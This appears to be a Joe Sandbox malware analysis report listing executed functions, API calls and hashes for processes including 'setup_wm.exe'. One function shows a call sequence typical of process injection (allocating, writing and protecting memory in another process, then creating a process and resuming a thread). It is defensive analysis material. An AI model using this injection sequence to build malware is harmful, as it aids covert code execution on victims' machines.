Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: e8b38785987ebe4bf97a71b2e294a612045f12fa57e0274daf3e7e500e703184
Instruction ID: f4cee7316d2dc079115e378cc56d94de77f11dc8331827bb02666d65c3f30ab8
Opcode Fuzzy Hash: e8b38785987ebe4bf97a71b2e294a612045f12fa57e0274daf3e7e500e703184
Instruction Fuzzy Hash: 4C016DB09086568FDB54AF79BC8616636F0EB98311740043BE10AC7960CE3858D0C744

Function 00007DF46E4B2B5C Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00007DF46E4B2B7C

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f6a5c260a6ff26826b95901847e0f94daf167b208f970919ab6999429e88efbf
Instruction ID: 1347751e46e37b76d45701fbab098c7f530ee6837ca6812f571139e8df74f0cb
Opcode Fuzzy Hash: f6a5c260a6ff26826b95901847e0f94daf167b208f970919ab6999429e88efbf
Instruction Fuzzy Hash: F9F0ECE1F1C24A4BE7246F765C851A771E6DB84311F14453BE90FC7185DC3D94C28648

Function 00007DF46E4D5644 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF46E4D568F

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: ddedd6023ad442b8d2b2fe3290ed3783bcd232237776f9c3a295af58d00cf6c3
Instruction ID: 11176a8c04ded030453a8764cf553eef639e5aee2bc9cdcb40ce212858800c19
Opcode Fuzzy Hash: ddedd6023ad442b8d2b2fe3290ed3783bcd232237776f9c3a295af58d00cf6c3
Instruction Fuzzy Hash: D2F082741046044FEB48EF5CC48876677E2FFE9315F10016AE90DC72E4DB359989C741

Function 00007DF46E4C3088 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetProcAddressForCaller.KERNELBASE ref: 00007DF46E4C30AF

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: c2543c20c0a7d110227d86949c13dfaa5e54e54e664fb098b1aa0bdcf88303a9
Instruction ID: bd3f978ca7b108aa648b5753e422ee8bb3923bda8d1f03a01fb05c7475ae1eb2
Opcode Fuzzy Hash: c2543c20c0a7d110227d86949c13dfaa5e54e54e664fb098b1aa0bdcf88303a9
Instruction Fuzzy Hash: 0FE0C251B18C0A0B6B6862BF248CABB51D6CBDC13230402BBE41EC3295EC54CC850385

Function 00007DF46E4DD8E4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007DF46E4DD909

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 23f3765db31a0df280e37a6bc4f8137308a1fee0486dc2818908f898aea27d2f
Instruction ID: c076b59af0e72806b2472201f695b54bc63e28b6ed3703abb36710452691a838
Opcode Fuzzy Hash: 23f3765db31a0df280e37a6bc4f8137308a1fee0486dc2818908f898aea27d2f
Instruction Fuzzy Hash: ADE0C232B150240BF72C6ABD2C8917A36DAC7CC572705423BF80AC3284ED7C8C4602D1

Function 00007DF46E4B3DD8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF46E4B3E05

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: 3b09555bf32cd7a482aca5e21dc4f37ab037edd0c1b9afc7390cc3b8e22e33b4
Instruction ID: e8962ba890b837cef90ccfebdd91965c224765eebe277c316b9fcb70ac533a6e
Opcode Fuzzy Hash: 3b09555bf32cd7a482aca5e21dc4f37ab037edd0c1b9afc7390cc3b8e22e33b4
Instruction Fuzzy Hash: 8CE04F305509064BEBA8E72DC84D3913AE1FB58306F64426ED405C9691CB79D89BCF81

Function 00007DF46E4C305C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00007DF46E4C307E

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: f1103fc3ee2f0f2db8bcd6da909ee3440a417a953d48b6ed0b7e3a88edae3bac
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: 4FD0A751724D0E1BEB48633F1C987A711D5EBCC225F54017BF40EC2285DD58CC950305

Function 00007DF46E4C5CC3 Relevance: 1.4, APIs: 1, Instructions: 150COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4C5D10

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 903acddc3c2cbd21899d181af60d2020bd4c0d22b9f6ec9809e98e44769c02c6
Instruction ID: 215d1ea1ba7791ac037c2277267c40358bb5a657460d214b267005249e55d3af
Opcode Fuzzy Hash: 903acddc3c2cbd21899d181af60d2020bd4c0d22b9f6ec9809e98e44769c02c6
Instruction Fuzzy Hash: 67414170618A498FDB94EF28C481AEBB3F1FF98710F50426AD44EC7196DA34F881CB85

Function 00007DF46E4B4620 Relevance: 1.4, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4B46EF

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: c3b5330ba83a094f7bad87bbcfda8b7898b28b22e9f53235a9dbd9f71cfcc7c9
Instruction ID: 5810ee4bdc7667b1657a44c8145813460f56e3ee6aff0995f26b627a7b39769f
Opcode Fuzzy Hash: c3b5330ba83a094f7bad87bbcfda8b7898b28b22e9f53235a9dbd9f71cfcc7c9
Instruction Fuzzy Hash: 40412A70A0449A4BEB68DF388CD44BB37F1EF85345714417BD86BCB186EA28E987C794

Function 00007DF46E58B260 Relevance: 1.4, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,?,?,?,?,?,?,00007DF46E4D5770), ref: 00007DF46E58B2A6

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: 1510f62e4c51649cb4b3fc6bb3479c9fee78b3cdc066acf53db6694c8fe85d1c
Instruction ID: 2cae5f07fed359fff9410bfd23b0491d8adf07d9600076e627a283fcddae3c4d
Opcode Fuzzy Hash: 1510f62e4c51649cb4b3fc6bb3479c9fee78b3cdc066acf53db6694c8fe85d1c
Instruction Fuzzy Hash: 1F41EBB0908A188FDB91EF5894887D277E5FB68301F1842BBDC4DCF25ADB748885CB90

Function 00007DF46E589618 Relevance: 1.3, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,?,?,?,?,-00000002,00007DF46E4D59FD,?,?,?,?,?,?,-00000002,00007DF46E4D5A9F), ref: 00007DF46E589669

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3c3f3896645624ed2edffa25d0ed107847367446d48ff0b9b56c9f709a2f52a8
Instruction ID: ef1b392146a887ba1f2a7f968b9230aa864ad68687b36503dc9a9b40b35248a1
Opcode Fuzzy Hash: 3c3f3896645624ed2edffa25d0ed107847367446d48ff0b9b56c9f709a2f52a8
Instruction Fuzzy Hash: 3531C0706158998FFF98EFA9C4B57E733E1FF94301F540479980FCA196CA28A842C715

Function 00007DF46E4CD5E0 Relevance: 1.3, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4CD682

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 14d07331c19738ae6f5dcbbc3446d40274566deaf3c6ba6d90dddde88c6f0ea8
Instruction ID: 5799f199e9d0ab065840188311d9da136d0454b4a67c7f321edae1d8b8889a26
Opcode Fuzzy Hash: 14d07331c19738ae6f5dcbbc3446d40274566deaf3c6ba6d90dddde88c6f0ea8
Instruction Fuzzy Hash: 2521E470A18B094FD748AF68D8895F677E4FB98711F00426FD44EC3262EA74E885CBC5

Function 00007DF46E4C2E18 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE ref: 00007DF46E4C2E40

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: dd3043cd4fdbf6ce1bec2523c8a3e90b76413ae5d3024df9cc9149889a1f6f13
Instruction ID: 960389c390e36a64727575624b4d19dcaa029abfdb0c5c1992fe7944db696564
Opcode Fuzzy Hash: dd3043cd4fdbf6ce1bec2523c8a3e90b76413ae5d3024df9cc9149889a1f6f13
Instruction Fuzzy Hash: 7911ECF0B0594A1BE75CAB3998493F736E1FF94B00B444376D80FC70A5EE689DC58248

Function 00007DF46E4B6540 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

malloc.MSVCRT(?,?,?,?,-00000001,?,-00000001,00007DF46E4B65CE), ref: 00007DF46E4B6585

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction ID: cb47e2569b52662ca798eb0b66b826e8126e15038a98f715a83ae4c55057456a
Opcode Fuzzy Hash: 051b47b6163c57a56397831363f2f208832c5eccc5cbea97d62df897e1ee0233
Instruction Fuzzy Hash: 6401A270A14A065BE3689F29D888263B3E1FB98311F04417AD409C3284DB38E8D0C780

Function 00007DF46E4B24F4 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007DF46E4B254E

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 85f62002f11eda201487085593c698b0135f5f3e41b5990a1ae8dfcda2a01f33
Instruction ID: ac15ac9916b90edf98469925bd93ab7d35c30781b4c9bde345377b1455a2b607
Opcode Fuzzy Hash: 85f62002f11eda201487085593c698b0135f5f3e41b5990a1ae8dfcda2a01f33
Instruction Fuzzy Hash: 32016270A18E4B4BEB58DF3C8C6526332E1FF58315754816AD00EC72E4FE29E8828709

Function 00007DF46E4D37E8 Relevance: 1.3, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4D37FE

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 12b16b66d14aa5c191870bddd5a7e4309bad3884871b1f4995f58294878dabf5
Instruction ID: c2439ae7ed2e5d484bd1bd82f6982f7863b2d6475fa26ba77236865813024642
Opcode Fuzzy Hash: 12b16b66d14aa5c191870bddd5a7e4309bad3884871b1f4995f58294878dabf5
Instruction Fuzzy Hash: 27F01DB0615E4B9FEB84EF29C4D876673E0FB68305F60447BE40AC2190D779D894C751

Function 0000011F791B19A0 Relevance: 1.3, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 0000011F791B19E5

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction ID: 25bc9f65c88d1e614c573aa9568271f157837e45393279cc3538588a968b3a82
Opcode Fuzzy Hash: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction Fuzzy Hash: E6F01731214A098FDF9CEF95D8D5EE133A5FB28301F0501B9CD0ACB19ADA61E885C791

Function 00007DF46E5102AC Relevance: 1.3, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,?,?,00000000,00000000), ref: 00007DF46E5102F2

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e005b8aad8ae59e5c4306d33e7cf4f806ca0153c9240256dc9db618efce1777c
Instruction ID: e358597af618c3c843f7e9ae40211c10e7e6438c299ef408932cbfe77ab4826d
Opcode Fuzzy Hash: e005b8aad8ae59e5c4306d33e7cf4f806ca0153c9240256dc9db618efce1777c
Instruction Fuzzy Hash: EAF0187451BA0E8BFF5CA7A598686AB37F1EF14306F04103FD80BD1590DA6E9464D721

Function 00007DF46E5895D4 Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

free.MSVCRT(?,?,?,?,?,?,?,00007DF46E5896DA,?,?,?,?,?,?,-00000002,00007DF46E4D59FD), ref: 00007DF46E5895F3

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 93a629741bab06a182ed7c8d449849feef47e04a3418518c2bb9a01bc531160b
Instruction ID: 499ab2cb5feaf4e6369759b561b4bc6c8bbd45a19cb77a1b3cc60e09e37863d5
Opcode Fuzzy Hash: 93a629741bab06a182ed7c8d449849feef47e04a3418518c2bb9a01bc531160b
Instruction Fuzzy Hash: 8EE012746168494BFF98FBA584B866772E1EF58205F50047A980FC62D2CA19DD42C745

Function 00007DF46E4DDADC Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007DF46E4DDAE6

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4c39f900df3972edeb9c523e4745635d2babc99cae264e1317ea5b764d4d565e
Instruction ID: 1d8247767c5e82305b617c5d0bbce048d407ec682639171ebdd4ff234ea8cb02
Opcode Fuzzy Hash: 4c39f900df3972edeb9c523e4745635d2babc99cae264e1317ea5b764d4d565e
Instruction Fuzzy Hash: 71D05E50B15D0E1BAB58A37E1C8A17621D6D7D81227440637B80AC3254ED29DC858254

Function 00007DF46E4D5500 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4D5512

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6e328c12dc8307f618a414a7ee27d1f513c26b9c3dfb4301b0faf22b9c49d378
Instruction ID: e4b7125b58109774fff9631daccca2105a362c42bc826e2bd333ff25323b33d6
Opcode Fuzzy Hash: 6e328c12dc8307f618a414a7ee27d1f513c26b9c3dfb4301b0faf22b9c49d378
Instruction Fuzzy Hash: 03D01331355C0C5F5684E65DDCC893433D5E7DC125314057FD40DC7255D5569C87C760

Function 00007DF46E4C5BBC Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4C5BC5

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b7031c71d370f0c4b9d1add862bc0dfec61c612abdfff09cb5e9d61695c69b58
Instruction ID: 6433c602a5855d0c4fb975f43202e5ac96cfd7dfefe46f2bec3d7b24f1505741
Opcode Fuzzy Hash: b7031c71d370f0c4b9d1add862bc0dfec61c612abdfff09cb5e9d61695c69b58
Instruction Fuzzy Hash: 04B0926499AD4B42AD0833760D9919A29A0AB14601BC501259806C0050E50E909A829A

Function 00007DF46E4B4A20 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007DF46E4B4A29

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 551c0ffc82b28a3876ee79cfc9de3840c8837f1e4274ad0e5daf9a8a7b3ff23c
Instruction ID: c741381c53317ed93acf1de60341ac84fd0f7a7fc63e4b4ec9554c8ce6e92c02
Opcode Fuzzy Hash: 551c0ffc82b28a3876ee79cfc9de3840c8837f1e4274ad0e5daf9a8a7b3ff23c
Instruction Fuzzy Hash: BCB01264E27C4F02ED4C33770E5906A36A0AF1C202FC40015E806C0C54F64CC4D5A34A

Non-executed Functions

Function 0000011F791B0511 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1767089124.0000011F791B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000011F791B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11f791b0000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction ID: 9c6f723353de5f7bfac1b68b00d860ec9f8fa9508ac40f659eae0282c9a534f1
Opcode Fuzzy Hash: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
Instruction Fuzzy Hash: 26B01132E28A0082E3880E0AB8023B0F2B0C30B300F00B0322008F3220C828CC08028F

Function 00007DF46E4DE261 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000003.1766636545.00007DF46E4B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF46E4B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_7df46e4b1000_OpenWith.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f5df41ea43a57528ce76f95f617c5d60ae02f95908509022172248d9e28bd8
Instruction ID: 317b8491c6c81d94af8fc2b3a06f72133790875556e8c436f9feff669d1d81d5
Opcode Fuzzy Hash: 46f5df41ea43a57528ce76f95f617c5d60ae02f95908509022172248d9e28bd8
Instruction Fuzzy Hash: FFB01130E28808C2C2280E0AF802330F2B0C30B300F00303A2000F3A20C8BACC82008F

Analysis Process: setup_wm.exePID: 5452, Parent PID: 5952COMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	15.9%
Signature Coverage:	0%
Total number of Nodes:	290
Total number of Limit Nodes:	21

Executed Functions

Function 00007DF4B9901958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007DF4B990199B
NtAllocateVirtualMemory.NTDLL ref: 00007DF4B9901A3A
NtWriteVirtualMemory.NTDLL ref: 00007DF4B9901A88
NtQueryInformationProcess.NTDLL ref: 00007DF4B9901AB0
NtReadVirtualMemory.NTDLL ref: 00007DF4B9901AE0
NtReadVirtualMemory.NTDLL ref: 00007DF4B9901B13
NtReadVirtualMemory.NTDLL ref: 00007DF4B9901B42
NtReadVirtualMemory.NTDLL ref: 00007DF4B9901B76
NtProtectVirtualMemory.NTDLL ref: 00007DF4B9901BBD
NtProtectVirtualMemory.NTDLL ref: 00007DF4B9901C44
NtWriteVirtualMemory.NTDLL ref: 00007DF4B9901C69
NtProtectVirtualMemory.NTDLL ref: 00007DF4B9901C8D

Strings

H, xrefs: 00007DF4B9901C15
H, xrefs: 00007DF4B9901BF2

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
String ID: H$H
API String ID: 874015164-136785262
Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
Instruction ID: 256a80f3cd8967d8d3951038bbb0583c94fed41a7a416c6787f45742f9a4e463
Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
Instruction Fuzzy Hash: 85B1B57060CB888FD764DF68D885A9BBBE5FBD5304F004A2EE58EC3251DB35E5058B86

Function 0000021CE78F2D24 Relevance: 15.3, APIs: 1, Strings: 7, Instructions: 1263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000021CE78E4998: calloc.MSVCRT ref: 0000021CE78E49CB

RtlFormatCurrentUserKeyPath.NTDLL ref: 0000021CE78F386B

Strings

;$dW, xrefs: 0000021CE78F352D
t, xrefs: 0000021CE78F3A60
;$dW, xrefs: 0000021CE78F3D1C
MZ, xrefs: 0000021CE78F3583
N, xrefs: 0000021CE78F3A58
;Ln, xrefs: 0000021CE78F31B4
MZ, xrefs: 0000021CE78F3971

Memory Dump Source

Source File: 00000008.00000002.2584691781.0000021CE78E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021CE78E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_21ce78e1000_setup_wm.jbxd

Similarity

API ID: CurrentFormatPathUsercalloc
String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
API String ID: 4207655178-84560671
Opcode ID: 1512b8534d4c685afcc9061355cc33150ae67fa718ee72ec55426bd84ba67b64
Instruction ID: 8e6a3e953c453fe3505c33ab2a98f87142a0c517e682a1256c078aaebf54cd63
Opcode Fuzzy Hash: 1512b8534d4c685afcc9061355cc33150ae67fa718ee72ec55426bd84ba67b64
Instruction Fuzzy Hash: 6FA29DB4518B888FD3B5DF1888897EAB7E4FBA9701F500A2FD58EC3251DB749541CB82

Function 00007DF4B9901CE8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 296processnativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4B9901290: RtlAddFunctionTable.KERNEL32 ref: 00007DF4B99012BD

Part of subcall function 00007DF4B99012C8: VirtualProtect.KERNELBASE ref: 00007DF4B99012F5

Part of subcall function 00007DF4B9901438: RegOpenKeyExW.KERNELBASE ref: 00007DF4B9901497
Part of subcall function 00007DF4B9901438: RegQueryValueExW.KERNELBASE ref: 00007DF4B99014E6
Part of subcall function 00007DF4B9901438: RegCloseKey.KERNELBASE ref: 00007DF4B990150C
Part of subcall function 00007DF4B9901438: GetVolumeInformationW.KERNELBASE ref: 00007DF4B9901570

calloc.MSVCRT ref: 00007DF4B9901DE3
CreateProcessW.KERNELBASE ref: 00007DF4B9901F80
NtResumeThread.NTDLL ref: 00007DF4B9901FA5
CloseHandle.KERNELBASE ref: 00007DF4B9901FBF
free.MSVCRT ref: 00007DF4B9901FDC

Strings

-, xrefs: 00007DF4B9901E95

Memory Dump Source

Source File: 00000008.00000003.1706002611.00007DF4B9901000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4B9901000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_7df4b9901000_setup_wm.jbxd

Similarity

API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumecallocfree
String ID: -
API String ID: 167522227-2547889144
Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
Instruction ID: 34ac16c3cda9e006cd5c9f452bbee0a9480ab0c23c08e280177039d6bf499c1f
Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
Instruction Fuzzy Hash: 6991CA3060CA4A9FE7A4EBB4D45566B77F1FF94305F00852AE55BC3292DF78E8018781

Function 0000021CE7A01F40 Relevance: 5.2, APIs: 3, Instructions: 661memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 0000021CE7A02573
VirtualFree.KERNELBASE ref: 0000021CE7A026C5
RtlFreeHeap.NTDLL ref: 0000021CE7A026EE

Memory Dump Source

Source File: 00000008.00000003.1706264667.0000021CE7A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021CE7A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_3_21ce7a00000_setup_wm.jbxd

Similarity

API ID: Free$Heap$Virtual
String ID:
API String ID: 2808376930-0
Opcode ID: 0239afe9e4586817184aca5c5cd0e1f03da4a7935eb0d1bd2fc8b19bf1b4dd3b
Instruction ID: 55569fea427c64fdc229d26740e2af8ae0a4a13bfb66999664d4484e52adb80d
Opcode Fuzzy Hash: 0239afe9e4586817184aca5c5cd0e1f03da4a7935eb0d1bd2fc8b19bf1b4dd3b
